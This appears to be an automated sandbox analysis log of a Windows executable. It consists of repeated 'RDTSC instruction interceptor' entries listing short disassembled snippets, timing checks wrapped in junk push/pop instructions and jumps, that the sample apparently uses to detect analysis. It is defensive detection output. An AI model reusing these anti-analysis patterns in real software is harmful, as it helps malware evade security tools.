Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F885F second address: 15F8872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9D01181AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8DF8 second address: 15F8DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F9343 second address: 15F935B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 js 00007F9D01181AA6h 0x0000000d jp 00007F9D01181AA6h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CD5AA second address: 15CD5B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CDB9F second address: 15CDBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9D01181AB6h 0x0000000a jmp 00007F9D01181AB0h 0x0000000f popad 0x00000010 xor dword ptr [esp], 45430C82h 0x00000017 or dl, 00000077h 0x0000001a mov dword ptr [ebp+122D1B08h], edx 0x00000020 call 00007F9D01181AA9h 0x00000025 jbe 00007F9D01181ABAh 0x0000002b jmp 00007F9D01181AB4h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push edi 0x00000034 jbe 00007F9D01181AA6h 0x0000003a pop edi 0x0000003b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CDBF8 second address: 15CDC3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007F9D00F1DB68h 0x00000014 jmp 00007F9D00F1DB66h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CDC3C second address: 15CDC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F9D01181AA8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push edi 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CDF05 second address: 15CDF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9D00F1DB56h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov eax, dword ptr [eax] 0x0000000e jns 00007F9D00F1DB71h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE050 second address: 15CE05A instructions: 0x00000000 rdtsc 0x00000002 je 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE05A second address: 15CE05F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE180 second address: 15CE186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE86E second address: 15CE873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE873 second address: 15CE89C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9D01181AADh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE98E second address: 15CE994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE994 second address: 15CE998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15AEA5B second address: 15AEA71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F9D00F1DB56h 0x00000010 jng 00007F9D00F1DB56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15AEA71 second address: 15AEA8E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D01181AA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F9D01181AA8h 0x00000012 popad 0x00000013 push ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD003 second address: 15FD016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F9D00F1DB62h 0x0000000b jnl 00007F9D00F1DB56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD016 second address: 15FD039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D01181AB7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD18E second address: 15FD192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD192 second address: 15FD1AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D01181AB2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD1AA second address: 15FD1C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB65h 0x00000009 je 00007F9D00F1DB56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD1C9 second address: 15FD1D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD1D7 second address: 15FD1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F9D00F1DB5Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD1F1 second address: 15FD1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD331 second address: 15FD342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB5Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD342 second address: 15FD369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F9D01181AA6h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F9D01181AB8h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD369 second address: 15FD37F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9D00F1DB56h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F9D00F1DB56h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD37F second address: 15FD38B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD4F5 second address: 15FD4F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD4F9 second address: 15FD504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD504 second address: 15FD509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD66A second address: 15FD684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AB3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD7EA second address: 15FD805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD805 second address: 15FD809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD809 second address: 15FD80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD80D second address: 15FD813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD813 second address: 15FD824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FD824 second address: 15FD828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15FF5B2 second address: 15FF5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB69h 0x00000009 jng 00007F9D00F1DB56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 157D216 second address: 157D21A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 157D21A second address: 157D236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F9D00F1DB5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F9D00F1DB56h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15823C5 second address: 15823CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15823AD second address: 15823B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15823B1 second address: 15823C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1606C11 second address: 1606C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1606C17 second address: 1606C21 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D01181AA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 160720B second address: 1607246 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9D00F1DB60h 0x0000000a pop ecx 0x0000000b jmp 00007F9D00F1DB65h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jo 00007F9D00F1DB68h 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F9D00F1DB56h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1607246 second address: 160724A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16067D0 second address: 16067ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16067ED second address: 16067F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 160B190 second address: 160B199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1611891 second address: 16118DE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F9D01181AB6h 0x00000013 jmp 00007F9D01181AB6h 0x00000018 popad 0x00000019 jne 00007F9D01181AB2h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161037C second address: 1610386 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9D00F1DB74h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16104D4 second address: 16104D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161078E second address: 1610792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161090C second address: 161092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F9D01181AB1h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F9D01181AA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161092D second address: 161093F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F9D00F1DB5Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1610A67 second address: 1610A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F9D01181AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1610A71 second address: 1610A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1610A75 second address: 1610A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1610A7E second address: 1610A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1610A8B second address: 1610A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1610A93 second address: 1610A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1610D7A second address: 1610D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1611027 second address: 1611039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a jg 00007F9D00F1DB56h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16112D8 second address: 16112DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16112DE second address: 16112E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16112E2 second address: 16112F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F9D01181AA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1614F6C second address: 1614F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1614F70 second address: 1614F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1614C99 second address: 1614CA3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9D00F1DB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16181AE second address: 16181B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16181B4 second address: 16181B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1617E6D second address: 1617E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1617E73 second address: 1617E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1617E77 second address: 1617E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F9D01181AA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1617E97 second address: 1617E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161D55B second address: 161D55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161D55F second address: 161D59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9D00F1DB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jg 00007F9D00F1DB56h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F9D00F1DB60h 0x0000001c popad 0x0000001d jmp 00007F9D00F1DB60h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161D59B second address: 161D5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161D5A1 second address: 161D5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CE3B5 second address: 15CE3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161DDEF second address: 161DDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161DDF7 second address: 161DDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161DDFC second address: 161DE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F9D00F1DB63h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161DE15 second address: 161DE19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 161E995 second address: 161E9A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9D00F1DB5Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16221A5 second address: 16221BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D01181AB2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 157D228 second address: 157D236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F9D00F1DB56h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1626ABE second address: 1626AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1626AC2 second address: 1626AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1626231 second address: 1626235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1626235 second address: 162623B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 162623B second address: 1626244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
